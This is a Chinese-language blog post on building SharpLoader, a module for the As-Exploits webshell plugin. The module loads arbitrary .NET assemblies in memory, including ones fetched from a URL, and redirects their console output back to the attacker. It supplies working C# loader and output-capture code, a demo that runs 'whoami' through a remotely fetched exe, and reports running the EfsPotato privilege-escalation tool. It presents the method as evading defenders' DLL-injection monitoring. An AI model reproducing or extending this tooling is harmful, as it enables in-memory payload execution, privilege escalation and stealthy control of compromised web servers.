讲讲As-Exploits新模块SharpLoader

yzddMr6 收录于类别技术文章

2022-03-06 2022-03-06 约 1959 字预计阅读 4 分钟

1 前言

最近给As-Exploits增加了一个新的模块：SharpLoader。该模块可以从内存中加载任意的assembly程序集，有点类似Cobalt Strike的execute-assembly功能。但是不同的是：cs是进程层面，用的是CLR方式，而WebShell本来就处于C#的进程中，可以调用原生的assembly加载。CLR方式加载C#整个过程都需要用到dll注入，防守方可以根据这一特点对dll反射等进行监控拦截。而在C#中调用原生的assembly加载跟普通的行为并无区别，更难以检测。

2 核心思路

其实仅加载assembly并不难，核心就是调用Assembly.Load。以SharpCradle为例，其核心代码如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


public static void loadAssembly(byte[] bin, object[] commands)
{
    Assembly a = Assembly.Load(bin);
    try
    {       
        a.EntryPoint.Invoke(null, new object[] { commands });
    }
    catch
    {
        MethodInfo method = a.EntryPoint;
        if (method != null)
        {
            object o = a.CreateInstance(method.Name);                    
            method.Invoke(o, null);
        }
    }//End try/catch            
}//End loadAssembly

难的是加载任意的assembly后如何拿到回显。因为一般C#的各种后渗透工具都是在控制台输出结果，没有办法直接回显到Web。

在哥斯拉中有很多内置的C#模块，但是都是开发者在原版的基础上经过二次改造才内置到了工具里面去，其中主要改造的就是回显部分。当时自己就在想，是否能够找到一种通用的方法，能够去任意的加载各种C#写的payload，而不需要二次开发呢。

研究了一下后搞了个骚操作：我们可以在程序执行的时候把输出流重定向到一个MemoryStream里，程序执行完了再还原回去。

经过改造后的核心代码如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


//重定向输出
TextWriter tmp = Console.Out;
MemoryStream memoryStream = new MemoryStream();
StreamWriter sw = new StreamWriter(memoryStream);
Console.SetOut(sw);
try
{
    a.EntryPoint.Invoke(null, new object[] { commands });
}
catch
{
    MethodInfo method = a.EntryPoint;
    if (method != null)
    {
        object o = a.CreateInstance(method.Name);
        method.Invoke(o, new object[] { commands });
    }
}
finally
{
   //增加延时，保证所有输出都进入缓冲区
     System.Threading.Thread.Sleep(2000);
     sw.Close();
     Console.SetOut(tmp);
}

3 第一次尝试

先搞个demo试一下，新建一个测试项目TestRun，这里直接远程获取exe并且加载。

1
2
3
4
5
6
7


public static void SharpLoaderTest()
{
    var run = new SharpLoader.Run();
    run.cs = "UTF-8";
    string result = run.loadAssemblyByUrl("http://localhost:7777/TestFunc.exe", "cmd /c whoami");
    Console.WriteLine(result);
}

其中TestFunc的内容如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


using System;
using System.Diagnostics;

namespace TestFunc
{
    internal class Program
    {
        public static void Main(string[] args)
        {
            foreach (var arg in args)
            {
                Console.WriteLine("arg: " + arg);
            }
            Process.Start("calc.exe");
        }
    }
}

测试后发现可以读取到各个参数，并且成功获取了Output的内容。

搞到插件里看看？

插件里也是可以的，换成头像哥的原版efspotato试试

测试内存加载，成功执行命令

URL远程加载成功执行命令

成功！

4 进一步优化

现在已经可以做到加载任意的.net二进制文件并且拿到回显了，但是在后续测试的过程中发现了一些问题。

在执行带有空格的命令的时候，不能获取预期的结果。

看了下源码，是因为我们的命令行参数在被用空格切割以后，被当作了不同的参数。

预期情况：

efspotato.exe

cmd ->args[0] ->net user

pipe ->args[1]

现在的情况：

efspotato.exe

net ->args[0]

user ->args[1]

在命令行中可以通过引号来解决某个参数中有空格的问题，但是毕竟咱们不是在命令行环境下执行的

改进之后，单个参数的空格中以{*}来作为占位符，最后统一替换掉。

1
2
3
4
5
6


string[] commands = command.Split(' ');
for (int i = 0; i < commands.Length; i++)
{
    //特殊标记替换为空格
    commands[i] = commands[i].Replace("{*}", " ");
}